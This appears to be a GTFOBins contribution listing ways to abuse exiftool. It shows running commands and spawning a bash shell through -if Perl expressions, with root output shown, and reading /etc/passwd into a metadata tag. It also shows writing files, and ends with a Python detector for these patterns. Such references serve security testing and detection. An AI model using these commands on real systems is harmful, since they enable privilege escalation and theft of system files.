GTFOBins.github.io
Add more exiftool commands
Run system command:
$ COMMAND=id
$ INPUT=sample.pdf
$ exiftool -if "system('$COMMAND');1" --filename $INPUT
uid=0(root) gid=0(root) groups=0(root)
ExifTool Version Number : 12.76
Run system command and exfiltrate result via metadata tags:
$ COMMAND=id
$ INPUT=sample.pdf
$ exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
1 image files updated
$ exiftool $INPUT | grep -i "description "
Description : uid=0(root) gid=0(root) groups=0(root).
Spawn an interactive system shell:
$ INPUT=sample.pdf
$ exiftool -if "system('bash')" $INPUT
$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4296 3456 pts/0 Ss 11:16 0:00 /bin/bash
root 348 3.2 0.3 32008 29184 pts/0 S 11:18 0:00 /usr/bin/perl -w /usr/bin/exiftool -if system('bash') file
root 349 0.0 0.0 4296 3584 pts/0 S 11:18 0:00 bash
root 352 0.0 0.0 7628 3456 pts/0 R+ 11:18 0:00 ps aux
Exfiltrate file data via metadata tags:
$ LFILE=/etc/passwd
$ INPUT=sample.pdf
$ exiftool "-description<=$LFILE" --filename $INPUT
$ exiftool sample.pdf | grep "Description "
Description : root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin...
Write file from metadata tag's content:
$ LFILE=outfile
$ INPUT=input_file
$ exiftool '-description=FILE DATA' $INPUT # prepare data to write
$ exiftool -description -W $LFILE --filename $INPUT
$ cat $LFILE
Description : FILE DATA
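
For defenders reviewing process telemetry on hosts where exiftool can run with elevated privileges, the following added example (not part of the original pull request or the GTFOBins project) flags the three argument patterns shown above: command execution inside an `-if` expression, a tag loaded from a file with `<=`, and tag output written to a file with `-W`. The function name, finding labels and sample argv lists are constructed for illustration.

```python
import os
import re

IF_OPT = re.compile(r"^-if\d*$", re.IGNORECASE)                # -if and numbered -if[NUM]
EXEC_IN_EXPR = re.compile(r"\b(?:system|exec)\s*\(|`|\bqx\b")  # Perl command execution
TAG_FROM_FILE = re.compile(r"^-[^=<]+<=(.+)$")                 # -TAG<=FILE reads FILE into a tag


def classify(argv):
    """Return sorted findings for one process argv (list of strings)."""
    # Locate exiftool even when logged as "/usr/bin/perl -w /usr/bin/exiftool ...".
    idx = next((i for i, a in enumerate(argv) if os.path.basename(a) == "exiftool"), None)
    if idx is None:
        return []
    args = argv[idx + 1:]
    findings = set()
    for pos, arg in enumerate(args):
        nxt = args[pos + 1] if pos + 1 < len(args) else ""
        # An -if condition is evaluated as Perl, so system()/backticks in it run commands.
        if IF_OPT.match(arg) and EXEC_IN_EXPR.search(nxt):
            findings.add("if-expression-runs-command")
        # -TAG<=FILE copies the contents of FILE into the tag (file read).
        m = TAG_FROM_FILE.match(arg)
        if m:
            findings.add("tag-loaded-from-file:" + m.group(1))
        # -W (-tagOut) writes tag values to the named output file (file write).
        if (arg == "-W" or arg.lower() == "-tagout") and nxt:
            findings.add("tag-written-to-file:" + nxt)
    return sorted(findings)


SAMPLES = [  # constructed argv samples modelled on the commands above
    ["/usr/bin/perl", "-w", "/usr/bin/exiftool", "-if", "system('bash')", "file"],
    ["exiftool", "-description<=/etc/passwd", "--filename", "sample.pdf"],
    ["exiftool", "-description", "-W", "outfile", "--filename", "input_file"],
    ["exiftool", "-if", "$filetype eq 'PDF'", "-description", "sample.pdf"],  # benign
]

if __name__ == "__main__":
    for argv in SAMPLES:
        print(classify(argv) or ["no-findings"], " ".join(argv))
```

The function takes an argv list rather than a flat command-line string because process listings drop shell quoting, as the `ps aux` output above shows.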